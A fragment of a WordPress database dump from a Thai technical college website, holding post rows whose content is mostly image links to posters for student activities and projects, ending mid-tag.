(4277, 1, '2018-11-08 21:07:27', '2018-11-08 14:07:27', '', 'AVT-Banner', '', 'inherit', 'closed', 'closed', '', 'avt-banner', '', '', '2018-11-08 21:07:27', '2018-11-08 14:07:27', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/AVT-Banner.png', 0, 'attachment', 'image/png', 0),
(4280, 1, '2018-11-08 21:13:19', '2018-11-08 14:13:19', '<a href=\"/wp-content/uploads/2021/12/S__107216900.jpg\"><img class=\"aligncenter wp-image-12264 size-large\" src=\"/wp-content/uploads/2021/12/S__107216900-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-12265 size-full\" src=\"/wp-content/uploads/2021/12/S__107241475.jpg\" alt=\"\" width=\"828\" height=\"586\" />\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2021/12/263819521_882027892503121_1573443646954724338_n.png\"><img class=\"aligncenter wp-image-12269 size-large\" src=\"/wp-content/uploads/2021/12/263819521_882027892503121_1573443646954724338_n-724x1024.png\" alt=\"\" width=\"640\" height=\"905\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2021/12/97244.jpg\"><img class=\"aligncenter wp-image-12266 size-large\" src=\"/wp-content/uploads/2021/12/97244-732x1024.jpg\" alt=\"\" width=\"640\" height=\"895\" /></a>\r\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2020/12/โครงการอนุรักษ์พันธุกรรมพืช63.jpg\"><img class=\"aligncenter wp-image-10989 size-large\" src=\"/wp-content/uploads/2020/12/โครงการอนุรักษ์พันธุกรรมพืช63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการทัศนศึกษา.jpg\"><img class=\"aligncenter wp-image-10990 size-large\" src=\"/wp-content/uploads/2020/12/โครงการทัศนศึกษา-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการศสานาและวัฒนธรรม.jpg\"><img class=\"aligncenter wp-image-10991 size-large\" src=\"/wp-content/uploads/2020/12/โครงการศสานาและวัฒนธรรม-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63.jpg\"><img class=\"aligncenter wp-image-10992 size-large\" src=\"/wp-content/uploads/2020/12/เลขที่-13-โครงกาจัดหาและแลกเปลี่ยนความรู้ประสบการณ์63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63.jpg\"><img class=\"aligncenter wp-image-10993 size-large\" src=\"/wp-content/uploads/2020/12/โครงการส่งเสริมพัฒนาผลิตภัณฑ์ชุมชน63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการคุณธรรม63.jpg\"><img class=\"aligncenter wp-image-10994 size-large\" src=\"/wp-content/uploads/2020/12/โครงการคุณธรรม63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการเก็บขยะป่าชายเลน63.jpg\"><img class=\"aligncenter wp-image-10995 size-large\" src=\"/wp-content/uploads/2020/12/โครงการเก็บขยะป่าชายเลน63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/เปิดประชุมอวท63.jpg\"><img class=\"aligncenter wp-image-10996 size-large\" src=\"/wp-content/uploads/2020/12/เปิดประชุมอวท63-1024x724.jpg\" alt=\"\" width=\"640\" height=\"453\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการนักเรียน-นักศึกษาต้นแบบ63.jpg\"><img class=\"aligncenter wp-image-10997 size-large\" src=\"/wp-content/uploads/2020/12/โครงการนักเรียน-นักศึกษาต้นแบบ63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/19-โครงการประกวดร้องเพลง63.jpg\"><img class=\"aligncenter wp-image-10998 size-large\" src=\"/wp-content/uploads/2020/12/19-โครงการประกวดร้องเพลง63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63.jpg\"><img class=\"aligncenter wp-image-10999 size-large\" src=\"/wp-content/uploads/2020/12/โครงการพัมนาส่งเสริมทักษะถาษาต่างปรเเทศ63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63.jpg\"><img class=\"aligncenter wp-image-11000 size-large\" src=\"/wp-content/uploads/2020/12/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือ63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการส่งเสริมทักษะภาษาต่างประเทศ.jpg\"><img class=\"aligncenter wp-image-11001 size-large\" src=\"/wp-content/uploads/2020/12/โครงการส่งเสริมทักษะภาษาต่างประเทศ-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63.jpg\"><img class=\"aligncenter wp-image-11002 size-large\" src=\"/wp-content/uploads/2020/12/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/14-โครงการสร้างแรงบันดาลใจ.jpg\"><img class=\"aligncenter wp-image-11003 size-large\" src=\"/wp-content/uploads/2020/12/14-โครงการสร้างแรงบันดาลใจ-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/สิ่งประดิษฐ์63.jpg\"><img class=\"aligncenter wp-image-11004 size-large\" src=\"/wp-content/uploads/2020/12/สิ่งประดิษฐ์63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการส่งเสริมกิจกรรมอาสาพัฒนา63.jpg\"><img class=\"aligncenter wp-image-11005 size-large\" src=\"/wp-content/uploads/2020/12/โครงการส่งเสริมกิจกรรมอาสาพัฒนา63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/9-โครงการสร้างผู้ประกอบการใหม่63.jpg\"><img class=\"aligncenter wp-image-11006 size-large\" src=\"/wp-content/uploads/2020/12/9-โครงการสร้างผู้ประกอบการใหม่63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/เทคนิคระยองบัญชี63.jpg\"><img class=\"aligncenter wp-image-11007 size-large\" src=\"/wp-content/uploads/2020/12/เทคนิคระยองบัญชี63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/ทดสอบมาตรฐานการใช้คอม.jpg\"><img class=\"aligncenter wp-image-11008 size-large\" src=\"/wp-content/uploads/2020/12/ทดสอบมาตรฐานการใช้คอม-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63.jpg\"><img class=\"aligncenter wp-image-11009 size-large\" src=\"/wp-content/uploads/2020/12/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-อวท63-721x1024.jpg\" alt=\"\" width=\"640\" height=\"909\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการแข่งขันทักษะวิชาการปิโตรเคมี.jpg\"><img class=\"aligncenter wp-image-11010 size-large\" src=\"/wp-content/uploads/2020/12/โครงการแข่งขันทักษะวิชาการปิโตรเคมี-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน.jpg\"><img class=\"aligncenter wp-image-11011 size-large\" src=\"/wp-content/uploads/2020/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการแข่งขันการตอบปัญหาวิชาการ.jpg\"><img class=\"aligncenter wp-image-11012 size-large\" src=\"/wp-content/uploads/2020/12/โครงการแข่งขันการตอบปัญหาวิชาการ-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/23-โครงการออมทรัพย์กับธนาคารโรงเรียน63.jpg\"><img class=\"aligncenter wp-image-11013 size-large\" src=\"/wp-content/uploads/2020/12/23-โครงการออมทรัพย์กับธนาคารโรงเรียน63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/พัฒนาคุณธรรมจริยธรรม.jpg\"><img class=\"aligncenter wp-image-11014 size-large\" src=\"/wp-content/uploads/2020/12/พัฒนาคุณธรรมจริยธรรม-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการกีฬาสีภายใน63.jpg\"><img class=\"aligncenter wp-image-11015 size-large\" src=\"/wp-content/uploads/2020/12/โครงการกีฬาสีภายใน63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการประกวดโครการวิชาชีพ63.jpg\"><img class=\"aligncenter wp-image-11016 size-large\" src=\"/wp-content/uploads/2020/12/โครงการประกวดโครการวิชาชีพ63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63.jpg\"><img class=\"aligncenter wp-image-11017 size-large\" src=\"/wp-content/uploads/2020/12/โครงการคอมพิวเตอร์ธุรกิจฟื้นฟูวิถีชาวพุทธ63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการส่งเสริมการหารายได้ระหว่างเรียน63.jpg\"><img class=\"aligncenter wp-image-11018 size-large\" src=\"/wp-content/uploads/2020/12/โครงการส่งเสริมการหารายได้ระหว่างเรียน63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a> <a href=\"/wp-content/uploads/2020/12/โครงการเสริมสร้างบุคลิกภาพ63.jpg\"><img class=\"aligncenter wp-image-11019 size-large\" src=\"/wp-content/uploads/2020/12/โครงการเสริมสร้างบุคลิกภาพ63-724x1024.jpg\" alt=\"\" width=\"640\" height=\"905\" /></a></p>\r\n \r\n<p style=\"text-align: center;\">---------------------------------</p>\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการประกวดโครการวิชาชีพ.jpg\"><img class=\"aligncenter wp-image-6370\" src=\"/wp-content/uploads/2019/11/โครงการประกวดโครการวิชาชีพ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/เปิดประชุมอวท.jpg\"><img class=\"aligncenter wp-image-6361\" src=\"/wp-content/uploads/2019/11/เปิดประชุมอวท.jpg\" alt=\"\" width=\"400\" height=\"283\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการประกวดนักเรียน-นักศึกษาต้นแบบ.jpg\"><img class=\"aligncenter wp-image-6371\" src=\"/wp-content/uploads/2019/11/โครงการประกวดนักเรียน-นักศึกษาต้นแบบ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการอนุรักษ์พันธุกรรมพืช.jpg\"><img class=\"aligncenter wp-image-6379\" src=\"/wp-content/uploads/2019/11/โครงการอนุรักษ์พันธุกรรมพืช.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการอนุรักษ์พันธุกรรมพืช.jpg\"><img class=\"aligncenter wp-image-6398\" src=\"/wp-content/uploads/2019/12/โครงการอนุรักษ์พันธุกรรมพืช.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการอาชีวศึกษาบูรณาการอาชีพ-108.jpg\"><img class=\"aligncenter wp-image-6381\" src=\"/wp-content/uploads/2019/11/โครงการอาชีวศึกษาบูรณาการอาชีพ-108.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/สิ่งประดิษฐ์แก้ไข.jpg\"><img class=\"aligncenter wp-image-6383\" src=\"/wp-content/uploads/2019/11/สิ่งประดิษฐ์แก้ไข.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการแข่งทักษะวิชาชีพการโรงแรม.jpg\"><img class=\"aligncenter wp-image-6366\" src=\"/wp-content/uploads/2019/11/โครงการแข่งทักษะวิชาชีพการโรงแรม.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/19-โครงการประกวดร้องเพลง.jpg\"><img class=\"aligncenter wp-image-6357\" src=\"/wp-content/uploads/2019/11/19-โครงการประกวดร้องเพลง.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/14-โครงการเชิญวิทยากรบรรยายพิเศษ.jpg\"><img class=\"aligncenter wp-image-6356\" src=\"/wp-content/uploads/2019/11/14-โครงการเชิญวิทยากรบรรยายพิเศษ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/9-โครงการสร้างผู้ประกอบการใหม่.jpg\"><img class=\"aligncenter wp-image-6355\" src=\"/wp-content/uploads/2019/11/9-โครงการสร้างผู้ประกอบการใหม่.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข.jpg\"><img class=\"aligncenter wp-image-6353\" src=\"/wp-content/uploads/2019/11/4-โครงการประกวดสิ่งประดิษฐ์จากสิ่งของเหลือใช้แก้ไข.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการศึกษาธรรมชาติ.jpg\"><img class=\"aligncenter wp-image-6374\" src=\"/wp-content/uploads/2019/11/โครงการศึกษาธรรมชาติ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/ประกาศ-อวท-2561-29.jpg\"><img class=\"aligncenter wp-image-6382\" src=\"/wp-content/uploads/2019/11/ประกาศ-อวท-2561-29.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการแข่งทักษะ.jpg\"><img class=\"aligncenter wp-image-6394\" src=\"/wp-content/uploads/2019/12/โครงการแข่งทักษะ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการคุณธรรม.jpg\"><img class=\"aligncenter wp-image-6368\" src=\"/wp-content/uploads/2019/11/โครงการคุณธรรม.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/27.-โครงการทัศนศึกษา-ท่องเที่ยว-.jpg\"><img class=\"aligncenter wp-image-6360\" src=\"/wp-content/uploads/2019/11/27.-โครงการทัศนศึกษา-ท่องเที่ยว-.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ.jpg\"><img class=\"aligncenter wp-image-6352\" src=\"/wp-content/uploads/2019/11/2.โครงการอบรมมาตรฐานคอมพิวเตอร์-คอมพิวเตอร์ธุรกิจ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ.jpg\"><img class=\"aligncenter wp-image-6372\" src=\"/wp-content/uploads/2019/11/โครงการพัฒนาส่งเสริมภาษาต่างประเทศ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/เลขที่-13-โครงการอบรมมัคคุเทศก์.jpg\"><img class=\"aligncenter wp-image-6362\" src=\"/wp-content/uploads/2019/11/เลขที่-13-โครงการอบรมมัคคุเทศก์.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการศสานาและวัฒนธรรม.jpg\"><img class=\"aligncenter wp-image-6373\" src=\"/wp-content/uploads/2019/11/โครงการศสานาและวัฒนธรรม.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล.jpg\"><img class=\"aligncenter wp-image-6399\" src=\"/wp-content/uploads/2019/12/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเล.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน.jpg\"><img class=\"aligncenter wp-image-6375\" src=\"/wp-content/uploads/2019/11/โครงการส่งเสริมและพัฒนาผลิตภัณฑ์สินค้าชุมชน.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์.jpg\"><img class=\"aligncenter wp-image-6358\" src=\"/wp-content/uploads/2019/11/20.โครงการกีฬาสานสัมพันธ์โลจิสติกส์.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/27.-โครงการถวานเทียนจำนำพรรษา-.jpg\"><img class=\"aligncenter wp-image-6389\" src=\"/wp-content/uploads/2019/12/27.-โครงการถวานเทียนจำนำพรรษา-.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/แห่เทียน.jpg\"><img class=\"aligncenter wp-image-6400\" src=\"/wp-content/uploads/2019/12/แห่เทียน.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการตะกร้อ.jpg\"><img class=\"aligncenter wp-image-6396\" src=\"/wp-content/uploads/2019/12/โครงการตะกร้อ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/23-โครงการออมทรัพย์กับธนาคารโรงเรียน.jpg\"><img class=\"aligncenter wp-image-6359\" src=\"/wp-content/uploads/2019/11/23-โครงการออมทรัพย์กับธนาคารโรงเรียน.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน.jpg\"><img class=\"aligncenter wp-image-6380\" src=\"/wp-content/uploads/2019/11/โครงการอบรมเชิงปฏิบัติการฟื้นฟูป่าชายเลน.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการส่งเสริมการหารรายได้ระหว่างเรียน.jpg\"><img class=\"aligncenter wp-image-6390\" src=\"/wp-content/uploads/2019/12/โครงการส่งเสริมการหารรายได้ระหว่างเรียน.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd.jpg\"><img class=\"aligncenter wp-image-6364\" src=\"/wp-content/uploads/2019/11/โครงการเสริมสร้างประชาธิปไตยในสถานศึกษา-psd.jpg\" alt=\"\" width=\"400\" height=\"568\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการตอบปัญหาวิชาการฯ.jpg\"><img class=\"aligncenter wp-image-6395\" src=\"/wp-content/uploads/2019/12/โครงการตอบปัญหาวิชาการฯ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่.jpg\"><img class=\"aligncenter wp-image-6377\" src=\"/wp-content/uploads/2019/11/โครงการส่งเสริมทักษะภาษาไทยวันสุนทรภู่.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม.jpg\"><img class=\"aligncenter wp-image-6365\" src=\"/wp-content/uploads/2019/11/โครงการแข่งขันการตอบปัญหาวิชาการช่างเชื่อม.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการไหว้ครูช่างเชื่อม.jpg\"><img class=\"aligncenter wp-image-6397\" src=\"/wp-content/uploads/2019/12/โครงการไหว้ครูช่างเชื่อม.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการจรรยาบรรวิชาชีพ.jpg\"><img class=\"aligncenter wp-image-6369\" src=\"/wp-content/uploads/2019/11/โครงการจรรยาบรรวิชาชีพ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการกิจกรรมวันสำคัญของชาติpsd.jpg\"><img class=\"aligncenter wp-image-6367\" src=\"/wp-content/uploads/2019/11/โครงการกิจกรรมวันสำคัญของชาติpsd.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการส่งเสริมกิจกรรมอาสาพัฒนา.jpg\"><img class=\"aligncenter wp-image-6376\" src=\"/wp-content/uploads/2019/11/โครงการส่งเสริมกิจกรรมอาสาพัฒนา.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/12/โครงการกีฬาสีภายใน.jpg\"><img class=\"aligncenter wp-image-6391\" src=\"/wp-content/uploads/2019/12/โครงการกีฬาสีภายใน.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการส่งเสริมทักษะภาษาอังกฤษ.jpg\"><img class=\"aligncenter wp-image-6378\" src=\"/wp-content/uploads/2019/11/โครงการส่งเสริมทักษะภาษาอังกฤษ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2019/11/โครงการเสริมสร้างบุคลิกภาพฯ.jpg\"><img class=\"aligncenter wp-image-6363\" src=\"/wp-content/uploads/2019/11/โครงการเสริมสร้างบุคลิกภาพฯ.jpg\" alt=\"\" width=\"400\" height=\"566\" /></a>\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4586\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-29-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4585\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-28-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4584\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-27-724x1024.png\" alt=\"\" width=\"400\" height=\"566\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4589\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-31-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4583\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-26-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4582\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-25-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4581\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-24-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4580\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-23-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4579\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-22-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4578\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-21-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4577\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-20-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4576\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-19-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4575\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-18-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4574\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-17-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4573\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-16-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4572\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-15-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4571\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-14-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4570\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-13-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4569\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-12-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4568\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-11-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4567\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-10-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4566\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-09-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4565\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-08-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4564\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-07-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4559\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-02-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4558\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-01-724x1024.png\" alt=\"\" width=\"400\" height=\"566\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4563\" src=\"/wp-content/uploads/2018/11/ประกาศ-อวท-2561-06-724x1024.png\" alt=\"\" width=\"400\" height=\"565\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-4562\" 